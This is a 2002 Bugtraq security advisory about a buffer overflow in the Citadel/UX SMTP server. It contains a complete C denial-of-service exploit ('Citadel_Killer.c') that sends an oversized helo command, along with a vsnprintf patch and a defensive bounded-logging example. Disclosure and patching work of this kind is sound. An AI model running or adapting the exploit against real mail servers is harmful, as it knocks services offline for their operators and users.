Bugtraq mailing list archives

Citadel/UX Server Remote DoS attack Vulnerability


From: xperc <xperc () hotmail com>
Date: 9 Mar 2002 23:10:15 -0000




What is Citadel/UX:

Citadel/UX is an advanced client/server BBS program 
for operating highly interactive sites, both on the 
Internet and over dialup. Users can connect to 
Citadel/UX using any of telnet, WWW, or client 
software. Among the features supported are public 
and private message bases (rooms), electronic mail, 
real-time chat, paging, etc. The server is 
multithreaded and can easily support a large number 
of concurrent users. In addition, SMTP and POP3 
servers are built-in for easy connection to Internet 
mail. Citadel/UX is both robust and mature, having 
been developed over the course of the past twelve 
years.

Problem:
I have found a buffer overflow in the Citadel/UX server. 
An attacker can execute a denial of service attack 
against it. Once the big buffer has been sent, the 
server is vulnerable.

Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]


[buffer] is around 4096 characters. 


/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.  
 * 
 *              by xperc () hotmail com
 */
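#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <string.h>     /* memset, strcat, strlen */
#include <unistd.h>     /* close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>  /* inet_addr */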

#define MAXBUF          8000 
#define MAXBUF2         MAXBUF+6
#define RECVBUF         256
#define CIT_SMTP        25      

int main(int argc, char *argv[])
{
        int sockfd;
        char msg[RECVBUF],buf[MAXBUF],sendbuf[MAXBUF2];
        struct sockaddr_in target;

        if(argc!=2){
                fprintf(stderr,"Usage: %s target_address\n",*argv);
                exit(-1);
        }
        if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0){
                perror("socket");
                exit(-1);
        }
        target.sin_family=AF_INET;
        target.sin_port=htons(CIT_SMTP);
        target.sin_addr.s_addr=inet_addr(argv[1]);
        if(connect(sockfd,(struct sockaddr*)&target,sizeof(target))<0){
                perror("connect");
                exit(-1);       
        }
        if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
                perror("recv");
                exit(-1);
        }

        memset(buf,'a',MAXBUF-1);
        buf[MAXBUF-1]='\0';     /* terminate so %s stops inside buf */
        snprintf(sendbuf,sizeof(sendbuf),"helo %s",buf);
        strcat(sendbuf,"\n");

        send(sockfd,sendbuf,strlen(sendbuf),0);
        close(sockfd);

        return 0;
}

Patch for this Vulnerability:
--- citadel-old/sysdep.c        Sat Dec  8 12:31:44 
2001
+++ citadel/sysdep.c    Sat Mar  9 05:51:11 
2002
@@ -106,7 +106,7 @@
        char buf[4096];
   
         va_start(arg_ptr, format);   
-        vsprintf(buf, format, arg_ptr);   
+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
         va_end(arg_ptr);   
 
        if (loglevel <= verbosity) { 
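
Review bot: the return value of vsnprintf is discarded on the changed line, so a message longer than sizeof(buf) (4096 bytes) is now cut off silently rather than overflowing. Consider checking whether the result is >= sizeof(buf) and marking the log line as truncated, so that an over-long helo argument like the one in the report remains visible in the log. This hunk bounds only the formatting step in this function; the code that reads the command line should enforce its own length limit on input as well.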


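The patch bounds the copy into the 4096-byte log buffer. As an added example (not Citadel/UX code and not from the original post; the names bounded_logf, log_helo_of_length and the truncation marker are hypothetical), here is a logger-style formatter that bounds the write and also reports truncation, run on a constructed over-long helo argument:

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF_SIZE 4096            /* same size as buf[] in the patch hunk */
#define TRUNC_MARK   "...[truncated]"

/* Hypothetical helper: format into out[] without writing past its end.
 * Returns 0 if the message fit, 1 if truncated, -1 on a format error. */
int bounded_logf(char out[LOG_BUF_SIZE], const char *format, ...)
{
    va_list ap;
    int needed;

    va_start(ap, format);
    needed = vsnprintf(out, LOG_BUF_SIZE, format, ap);
    va_end(ap);

    if (needed < 0) {                /* formatting error */
        out[0] = '\0';
        return -1;
    }
    if ((size_t)needed >= LOG_BUF_SIZE) {
        /* C99: the return value is the length the full message needed.
         * Overwrite the tail so the log shows the line was cut. */
        memcpy(out + LOG_BUF_SIZE - sizeof(TRUNC_MARK), TRUNC_MARK,
               sizeof(TRUNC_MARK));
        return 1;
    }
    return 0;
}

/* Constructed input: log an SMTP greeting with an n-byte argument. */
int log_helo_of_length(char out[LOG_BUF_SIZE], size_t n)
{
    static char arg[8001];
    if (n > sizeof(arg) - 1)
        n = sizeof(arg) - 1;
    memset(arg, 'a', n);
    arg[n] = '\0';
    return bounded_logf(out, "SMTP: helo %s", arg);
}

int main(void)
{
    char line[LOG_BUF_SIZE];
    printf("rc=%d\n", log_helo_of_length(line, 8000));
    return 0;
}
```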